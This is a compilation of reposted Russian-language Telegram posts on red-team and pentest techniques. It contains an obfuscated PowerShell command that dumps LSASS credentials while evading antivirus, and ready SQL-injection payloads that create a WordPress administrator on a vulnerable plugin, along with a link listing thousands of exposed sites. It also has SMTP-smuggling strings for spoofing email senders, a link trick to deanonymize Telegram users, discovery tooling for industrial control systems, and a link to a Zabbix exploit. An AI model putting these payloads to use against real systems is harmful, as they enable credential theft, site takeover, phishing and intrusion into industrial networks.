Forwarded from Ralf Hacker Channel (Ralf Hacker)
Ой, красота))) Получить данные из LSA без дампа LSASS.
Tool: https://github.com/Meowmycks/LetMeowIn?tab=readme-ov-file
Blog: https://posts.specterops.io/lsa-whisperer-20874277ea3b
#redteam #pentest #creds #dump
Historically was able to (and may presently still) bypass:
* Windows Defender
* Malwarebytes Anti-Malware
* CrowdStrike Falcon EDR (Falcon Complete + OverWatch)
Tool: https://github.com/Meowmycks/LetMeowIn?tab=readme-ov-file
Blog: https://posts.specterops.io/lsa-whisperer-20874277ea3b
#redteam #pentest #creds #dump
GitHub
GitHub - Meowmycks/LetMeowIn: A sophisticated, covert Windows-based credential dumper using C++ and MASM x64.
A sophisticated, covert Windows-based credential dumper using C++ and MASM x64. - Meowmycks/LetMeowIn
Obfuscated LSASS dumper command
😨 Подробнее, почему такое вообще возможно
&$env:???t??r???\*2\r[t-u]???[k-l]?2* $(gi $env:???t??r???\*2\c?m?[v-w]*l | % {
$_.FullName }), `#-999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999999976-decoy $(gps l?a*s).id c:\t??p\dmp.log full;
😨 Подробнее, почему такое вообще возможно
❤2🥴1
Forwarded from RedTeam brazzers (Pavel Shlundin)
@yurystrozhevsky, выпустил статью про ACL в Active Directory, максимально подробно и с объяснениями. Рекомендую к прочтению 👍. https://habr.com/ru/articles/809485/
Хабр
Всё что вы хотели знать про ACL в Active Directory
Введение В данной статье я постарался максимально полно и глубоко рассказать про построение и внутреннее использование ACL (Access Control List) внутри Active Directory. В этой статье нет рассказов...
Forwarded from RedTeam brazzers (Миша)
Иногда для реализации самых интересных векторов атак и осуществления умопомрачительных бизнес-целей требуется найти сегмент с АСУ ТП (привет пхд :) ). Есть несколько разных подходов:
- Можно пробовать обнаружить устройства с несколькими сетевыми интерфейсами. Ведь админ может взять и пробросить себе доступ куда не следует. Здесь, при отсутствии учетных данных, можно использовать NetBIOS , DNS, broadcast-igmp-discovery, IOXIDResolver . При наличии кредов от ДА можно обратить внимание на Powershell:
- Можно просто осуществлять поиск подсетей, извлекая их как с DC (Спасибо Димону Неверову)
Никто не запрещает и сдампить ADIDNS или обратиться к скриптам по типу tracebuster.py
- Помимо всего, иногда попадаются на глаза различные интересные службы — тот же SNMP. Или веб-админка какая-нибудь торчит. В таком случае на помощь придет httpx и aquatone
Тем не менее, основным мотивом поста стал инструмент Redpoint, нацеленный специально на АСУ ТП устройства. Репозиторий содержит в себе различные .nse скрипты для обнаружения подобных девайсов.
В связи с чем, можно с уверенностью говорить, что не один завод не устоит перед нами))))
Главное не перетрудиться, чтобы не случилась ситуация из мема 😃
- Можно пробовать обнаружить устройства с несколькими сетевыми интерфейсами. Ведь админ может взять и пробросить себе доступ куда не следует. Здесь, при отсутствии учетных данных, можно использовать NetBIOS , DNS, broadcast-igmp-discovery, IOXIDResolver . При наличии кредов от ДА можно обратить внимание на Powershell:
Invoke-Command -ComputerName $(Get-Content comps.txt) -ScriptBlock {ipconfig}- Можно просто осуществлять поиск подсетей, извлекая их как с DC (Спасибо Димону Неверову)
dsquery subnet , так и через рекурсивное хождение на машины: CornerShot , TrustMeter . Подобный функционал есть и в ldeep :sudo ldeep ldap -u reguser -p 'Password123' -d domain.ltd -s ldap://192.168.0.147 subnets
Никто не запрещает и сдампить ADIDNS или обратиться к скриптам по типу tracebuster.py
- Помимо всего, иногда попадаются на глаза различные интересные службы — тот же SNMP. Или веб-админка какая-нибудь торчит. В таком случае на помощь придет httpx и aquatone
./httpx -l hosts.txt -silent -o res.txt [-http-proxy socks5://127.0.0.1:1337]
cat res.txt | ./aquatone [-proxy socks5://127.0.0.1:1337]
Тем не менее, основным мотивом поста стал инструмент Redpoint, нацеленный специально на АСУ ТП устройства. Репозиторий содержит в себе различные .nse скрипты для обнаружения подобных девайсов.
BACnet-discover-enumerate.nse - Identify and enumerate BACnet devices
codesys-v2-discover.nse - Identify and enumerate CoDeSys V2 controllers
enip-enumerate.nse - Identify and enumerate EtherNet/IP devices from Rockwell Automation and other vendors
fox-info.nse - Identify and enumerate Niagara Fox devices
modicon-info.nse - Identify and enumerate Schneider Electric Modicon PLCs
omron-info.nse - Identify and enumerate Omron PLCs
pcworx-info.nse - Identify and enumerate PC Worx Protocol enabled PLCs
proconos-info.nse - Identify and enumerate ProConOS enabled PLCs
s7-enumerate.nse - Identify and enumerate Siemens SIMATIC S7 PLCs
В связи с чем, можно с уверенностью говорить, что не один завод не устоит перед нами))))
Главное не перетрудиться, чтобы не случилась ситуация из мема 😃
GitHub
GitHub - hdm/nextnet: nextnet is a pivot point discovery tool written in Go.
nextnet is a pivot point discovery tool written in Go. - hdm/nextnet
Forwarded from b␢code
t.me/username?text=Hello для вставки заготовленного текста в поле ввода сообщения. Нашел этому очень интересное применение, можно деанонить людей которые кликнули на ссылку. Вот пример ссылки. Если вы просто нажмете на него, мне придет уведомление что вы перешли
Так же сделал телеграм бота для создания таких ссылок: @inlinequery_bot
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Path Secure (CuriV)
Привет!
Я проводил множество собесов для админов и пентестеров, менторил несколько человек по разным аспектам наступательной информационной безопасности, сам участвовал в собесах. Мне нравится как разные вопросы позволяют пролить свет на глубину знаний человека в той или иной области.
Решил создать и курировать репозиторий с вопросами по наступательной безопасности на русском языке. Почему-то я не нашел такой репозиторий сразу. На английском языке таких огромное колличество и все они имею свои плюсы и минусы.
Этот репозиторий содержит в себе компиляцию вопросов по наступательной безопасности (offensive security). Используя этот материал, можно подготовиться к предстоящему собеседованию или прикинуть какие области знаний Вами не покрыты для самостоятельного обучения. Хороший интервьюер всегда задаст более глубокий и уточняющий вопрос, а соискателю будет невероятно полезно осознавать что еще ему стоит подучить или хотя бы иметь ввиду.
Проект является личной инициативой и несет в себе исключительно альтруистические цели. Проект является открытым, каждый желающий может сделать форк или предложить изменения в существующий список вопросов мне в личку в телеге (@curiv). Порядок вопросов и их категория носят субъективный характер. Репозиторий будет наполняться с течением времени, список источников представлен в последнем разделе. Вопросы будут агрегироваться из источников, список источников также будет пополняться. Если оставите положительные реакции, то мне будет приятно ❤️
https://github.com/curiv/russian-offensive-security-questions
#pentest #interview #repository
Я проводил множество собесов для админов и пентестеров, менторил несколько человек по разным аспектам наступательной информационной безопасности, сам участвовал в собесах. Мне нравится как разные вопросы позволяют пролить свет на глубину знаний человека в той или иной области.
Решил создать и курировать репозиторий с вопросами по наступательной безопасности на русском языке. Почему-то я не нашел такой репозиторий сразу. На английском языке таких огромное колличество и все они имею свои плюсы и минусы.
Этот репозиторий содержит в себе компиляцию вопросов по наступательной безопасности (offensive security). Используя этот материал, можно подготовиться к предстоящему собеседованию или прикинуть какие области знаний Вами не покрыты для самостоятельного обучения. Хороший интервьюер всегда задаст более глубокий и уточняющий вопрос, а соискателю будет невероятно полезно осознавать что еще ему стоит подучить или хотя бы иметь ввиду.
Проект является личной инициативой и несет в себе исключительно альтруистические цели. Проект является открытым, каждый желающий может сделать форк или предложить изменения в существующий список вопросов мне в личку в телеге (@curiv). Порядок вопросов и их категория носят субъективный характер. Репозиторий будет наполняться с течением времени, список источников представлен в последнем разделе. Вопросы будут агрегироваться из источников, список источников также будет пополняться. Если оставите положительные реакции, то мне будет приятно ❤️
https://github.com/curiv/russian-offensive-security-questions
#pentest #interview #repository
GitHub
GitHub - curiv/russian-offensive-security-questions: Репозиторий содержит список вопросов по наступальной безопасности.
Репозиторий содержит список вопросов по наступальной безопасности. - GitHub - curiv/russian-offensive-security-questions: Репозиторий содержит список вопросов по наступальной безопасности.
👍1
Forwarded from 1N73LL1G3NC3
Since "q" is passed directly into a $wpdb->get_results() call, you can execute SQL commands directly.
Adding a new WordPress user:
q=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_registered, user_status) VALUES ('poc', MD5('poc'), 'poc', 'poc@localhost.org', NOW(), 0);&auth=%20&integ=5be638728303f002fd54450e5866dd28Giving the user admin rights:
q=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (6, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'), (6, 'wp_user_level', '10');&auth=%20&integ=6ed26ea278413ec91e2c27fed01eac6cPWNED!
Note: Param "integ" is the md5sum of the query.
6K+ Services are found: https://hunter.how/list?searchValue=web.body%3D%22wp-content%2Fplugins%2Fwp-automatic%22
Tweet: https://x.com/mrtuxracer/status/1784229071460692232?s=12
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Forwarded from Эффект пентестера
NucleiScanner = Nuclei + Subfinder + Gau + Paramspider + httpx
https://github.com/0xKayala/NucleiScanner
https://github.com/0xKayala/NucleiScanner
GitHub
GitHub - 0xKayala/NucleiScanner: NucleiScanner is a Powerful Automation tool for detecting Unknown Vulnerabilities in the Web Applications
NucleiScanner is a Powerful Automation tool for detecting Unknown Vulnerabilities in the Web Applications - 0xKayala/NucleiScanner
Forwarded from Волосатый бублик
#adcs #bloodhound #ad
[ ADCS Attack Paths in BloodHound ]
This blog post(s) details the domain escalation requirements and explains how BloodHound incorporates the relevant components. SpectrOps team will demonstrate how to effectively use BloodHound to identify attack paths that involve ESC abuse.
Part 1
Part 2
[ ADCS Attack Paths in BloodHound ]
This blog post(s) details the domain escalation requirements and explains how BloodHound incorporates the relevant components. SpectrOps team will demonstrate how to effectively use BloodHound to identify attack paths that involve ESC abuse.
Part 1
Part 2
👍1
Forwarded from true_security
https://github.com/fortra/impacket/pull/1719
дамп sam/system/security через shadowcopy
дамп sam/system/security через shadowcopy
GitHub
[SECRETSDUMP] New Dump Method - Shadow Snapshot Method via WMI by PeterGabaldon · Pull Request #1719 · fortra/impacket
[UPDATE]
Thanks to @Veids and its advice, it is now working without RCE. It was my mistake that I implemented it bad, but now it is working. SAM/SYSTEM/SECURITY are downloaded via SMB from the Shad...
Thanks to @Veids and its advice, it is now working without RCE. It was my mistake that I implemented it bad, but now it is working. SAM/SYSTEM/SECURITY are downloaded via SMB from the Shad...
Forwarded from Netlas.io
CVE-2023-49606: RCE in Tinyproxy 1.10.0, 1.11.1, 9.8 rating 🔥
A use-after-free vulnerability in Tinyproxy allows an attacker to perform RCE via a specially crafted HTTP header.
Search at Netlas.io:
👉 Link: https://nt.ls/vWqHD
👉 Dork: http.headers.server:"tinyproxy/1.11.1" OR http.headers.server:"tinyproxy/1.10.0"
Read more: https://talosintelligence.com/vulnerability_reports/TALOS-2023-1889
A use-after-free vulnerability in Tinyproxy allows an attacker to perform RCE via a specially crafted HTTP header.
Search at Netlas.io:
👉 Link: https://nt.ls/vWqHD
👉 Dork: http.headers.server:"tinyproxy/1.11.1" OR http.headers.server:"tinyproxy/1.10.0"
Read more: https://talosintelligence.com/vulnerability_reports/TALOS-2023-1889
💡 Если в ходе багбаунти/пентеста вы встретили веб-приложение на Symfony, проверьте наличие дебаг режима (
#tips #bugbounty #pentest
/app_dev.php) и возможности чтения конфига: /app_dev.php/_profiler/open?file=app/config/parameters.yml#tips #bugbounty #pentest
Forwarded from Ralf Hacker Channel (Ralf Hacker)
CVE-2024-22120: Time Based SQL Injection in Zabbix Server Audit Log
PoC: https://support.zabbix.com/secure/attachment/236280/236280_zabbix_server_time_based_blind_sqli.py
#exploit #pentest
Affected and fixed version/s:
* 6.0.0 - 6.0.27 / 6.0.28rc1
* 6.4.0 - 6.4.12 / 6.4.13rc1
* 7.0.0alpha1 - 7.0.0beta1 / 7.0.0beta2
Allows to dump any values from database. As an example of exploit above allows privilege escalation from user to admin. In some cases, SQL injection leads to RCE.
PoC: https://support.zabbix.com/secure/attachment/236280/236280_zabbix_server_time_based_blind_sqli.py
#exploit #pentest
Forwarded from Proxy Bar
Please open Telegram to view this post
VIEW IN TELEGRAM
phdays.com
Positive Hack Days
An international cyberfestival for those who want to dive into the world of cybersecurity and have a great time
Forwarded from HaHacking
Gmail: smtp.gmail.com
Outlook: smtp-mail.outlook.com
Yandex: smtp.yandex.ru
Mail.Ru: smtp.mail.ru
...
SSL port: 465
TLS port: 587
From: EMAIL
From: <EMAIL>
From: "NAME" <EMAIL>
From: <EMAIL> (COMMENT)
From: GROUP: EMAIL, EMAIL
From: GROUP: <EMAIL>
Sender: EMAIL
email]addressparser, email-addresses]System.Net.Mail]net/mail]...
attacker@[testText\r\nRSET\r\nMAIL FROM: <spoofed@example.org>\r\nRCPT TO: <victim@example.org>\r\nDATA\r\nFrom: spoofed@example.org\r\n\r\nText\r\n.\r\nQUIT\r\n]
"Spoofed"
<attacker@outlook.com>: spoofed@outlook.com
<spoofed@gmail.com> "spoofed" <attacker@gmail.com>
Attacker
<spoofed@gmail.com>:<attacker@gmail.com>
": <attacker@gmail.com> "<spoofed@gmail.com>"
CRLF (\r\n) для внедрения SMTP команд❗️ Имперсонация➡️ (в данном случае) Подделка адреса электронной почты отправителя; Обеспечивает кратное повышение легитимности фишинговых писем в глазах атакуемых
@HaHacking
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Offensive Xwitter
😈 [ Aurélien Chalot @Defte_ ]
Wanna blindly check if the ADCS web enroll is installed on a domain ? Bruteforce the /certenroll endpoint without the trailing/ on all webservers. If you hit the ADCS web enroll you will get a location: /certenroll/ header in the response. Now enjoy blind ntlmrelayx ESC8 👀👀👀
Example. This webserver does not expose a ADCS web enroll endpoint but the Windows Admin Center panel. Yet your command will flag it as ADCS. While mine won't ;)
🐥 [ tweet ]
Wanna blindly check if the ADCS web enroll is installed on a domain ? Bruteforce the /certenroll endpoint without the trailing/ on all webservers. If you hit the ADCS web enroll you will get a location: /certenroll/ header in the response. Now enjoy blind ntlmrelayx ESC8 👀👀👀
Example. This webserver does not expose a ADCS web enroll endpoint but the Windows Admin Center panel. Yet your command will flag it as ADCS. While mine won't ;)
🐥 [ tweet ]